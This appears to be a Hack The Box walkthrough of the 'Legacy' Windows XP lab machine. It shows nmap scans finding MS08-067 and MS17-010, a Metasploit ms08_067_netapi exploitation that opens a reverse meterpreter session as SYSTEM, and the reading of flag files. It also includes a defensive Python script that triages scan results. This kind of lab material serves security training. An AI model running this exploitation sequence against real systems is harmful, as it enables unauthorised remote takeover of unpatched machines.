HTB Walkthrough - Legacy
Tony Harkness
Information Gathering
Scanned all TCP ports: 🕵️
# save target IP and box name as local variables
export ip='10.10.10.4'
export boxname='legacy'
# initial scan (braces are required: without them the shell reads $boxname_initial as one variable name)
rustscan -a $ip -- -sVC -T4 -oN /tmp/${boxname}_initial.nmap
# scan results
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h57m39s, deviation: 1h24m50s, median: 4d23h57m39s
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b0:77:34 (VMware)
| Names:
| LEGACY<00> Flags: <unique><active>
| HTB<00> Flags: <group><active>
| LEGACY<20> Flags: <unique><active>
| HTB<1e> Flags: <group><active>
| HTB<1d> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| Statistics:
| 00 50 56 b0 77 34 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 40600/tcp): CLEAN (Couldn't connect)
| Check 2 (port 46409/tcp): CLEAN (Couldn't connect)
| Check 3 (port 50902/udp): CLEAN (Failed to receive data)
| Check 4 (port 26949/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2026-01-04T06:05:20+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)
Enumeration
After reviewing the results of our scan, I went ahead and added the machine to our hosts file:
echo '10.10.10.4 legacy.htb'|sudo tee -a /etc/hosts
I then ran a follow-up nmap scan utilizing the NSE scripts for SMB vulnerabilities. Note: you can find a list of all the NSE scripts in /usr/share/nmap/scripts/ in Kali Linux. ‼️
nmap -Pn -p139,445 --script="smb-vuln*" legacy.htb
# results
Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
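As an added example that is not part of the original walkthrough, the following Python script triages the two scan outputs above (the initial service scan and the smb-vuln* NSE run) the way a defender reviewing the same results would: it pulls out the open SMB ports, the end-of-life OS banner, disabled message signing, the failed SMBv2 negotiation and every smb-vuln-* script that reports VULNERABLE, and turns them into a remediation checklist. The SAMPLE_SCAN text is a constructed, abbreviated copy of the output shown in this post; the function and variable names are my own and not from nmap or any library.

```python
"""Triage nmap SMB host-script output (-oN format) for legacy-Windows exposure.

Added example, not from the original post: parse the nmap normal-format output
and produce defender-facing findings (EOL OS, SMBv1-only, signing disabled,
smb-vuln-* scripts reporting VULNERABLE).
"""
import re

# Constructed sample: abbreviated from the two scans shown in the walkthrough.
SAMPLE_SCAN = """\
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Windows XP microsoft-ds
Host script results:
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
| smb-security-mode:
|   account_used: guest
|   message_signing: disabled (dangerous, but default)
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
"""

# "445/tcp open microsoft-ds ..." -> (445, tcp, microsoft-ds)
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)")
# "| smb-vuln-ms17-010:" or "|_smb2-security-mode: text" -> script name + first line
SCRIPT_RE = re.compile(r"^\|_?\s*(smb[\w-]*):\s*(.*)$")


def parse_scan(text):
    """Return (open_ports, scripts): open_ports is a list of (port, proto, service),
    scripts maps each host-script name to its body lines with the '|' gutter removed."""
    open_ports = []
    scripts = {}
    current = None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PORT_RE.match(line)
        if m:
            open_ports.append((int(m.group(1)), m.group(2), m.group(3)))
            continue
        m = SCRIPT_RE.match(line)
        if m:
            current = m.group(1)
            scripts[current] = [m.group(2)] if m.group(2) else []
            continue
        if current and line.startswith("|"):
            scripts[current].append(line.lstrip("|_ ").strip())
    return open_ports, scripts


def triage(text):
    """Derive a remediation checklist for one host from its scan text."""
    open_ports, scripts = parse_scan(text)
    findings = []

    smb_ports = [p for p, proto, _ in open_ports if proto == "tcp" and p in (139, 445)]
    if smb_ports:
        findings.append(f"SMB reachable on tcp/{','.join(map(str, smb_ports))}")

    osinfo = "\n".join(scripts.get("smb-os-discovery", []))
    if re.search(r"Windows (XP|2000|Server 2003)", osinfo):
        findings.append("End-of-life Windows version reported by SMB")

    sec = "\n".join(scripts.get("smb-security-mode", []))
    if "message_signing: disabled" in sec:
        findings.append("SMB message signing disabled (relay/tampering risk)")

    smb2 = "\n".join(scripts.get("smb2-security-mode", []))
    if "Couldn't establish" in smb2 or "negotiation failed" in smb2.lower():
        findings.append("SMBv1-only host (SMBv2 negotiation failed)")

    # Any smb-vuln-* script whose body carries "State: VULNERABLE" is a patch-now item;
    # "false" and "ERROR" results are deliberately ignored rather than treated as clean.
    for name, body in scripts.items():
        if name.startswith("smb-vuln-") and any(l.startswith("State: VULNERABLE") for l in body):
            cves = sorted({c for l in body for c in re.findall(r"CVE-\d{4}-\d+", l)})
            findings.append(f"{name}: VULNERABLE ({', '.join(cves) or 'no CVE listed'})")
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_SCAN):
        print("-", finding)
```

Feed it a saved `-oN` file per host and the output is the ticket you would open: isolate or decommission the end-of-life box, disable SMBv1, require message signing, and apply the MS08-067 and MS17-010 patches. Note that a script returning `ERROR` (like smb-vuln-ms10-061 above) is reported as nothing rather than as clean, so an absent finding is not proof the check passed.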
We get CVE-2008-4250. Let’s search for this via msfconsole 👀
msf > search type:exploit cve-2008-4250
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf > use 0
Exploitation
Now, let's configure the module and blast away 🔥
msf exploit(windows/smb/ms08_067_netapi) > options
msf exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
msf exploit(windows/smb/ms08_067_netapi) > set LHOST tun0
msf exploit(windows/smb/ms08_067_netapi) > options
msf exploit(windows/smb/ms08_067_netapi) > run
Now, if everything is configured correctly, you should have a meterpreter session open. 🤞
Now, let’s check our user 🔍
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Sweet! We already have the highest privileges we need. Now, let's grab those flags, shall we? 🧰
meterpreter > search -f user.txt
meterpreter > search -f root.txt
Simply copy the paths returned and cat out their contents! 🪙
meterpreter > cat 'c:\Documents and Settings\john\Desktop\user.txt'
meterpreter > cat 'c:\Documents and Settings\Administrator\Desktop\root.txt'
Steps 2 Pwn
- Initial scan and enumeration indicated a legacy version of Windows with SMB open
- Utilized the exploit associated with CVE-2008-4250 to get RCE as NT AUTHORITY\SYSTEM via Metasploit
- Grabbed user and root flags
Improved skills
- Searching for files in a meterpreter session
- Printing the contents of files in a meterpreter session
- Enumerating user id in a meterpreter session
- How to use and locate NSE scripts
- How to add an entry to the hosts file in one line
Used tools
- rustscan
- nmap
- msfconsole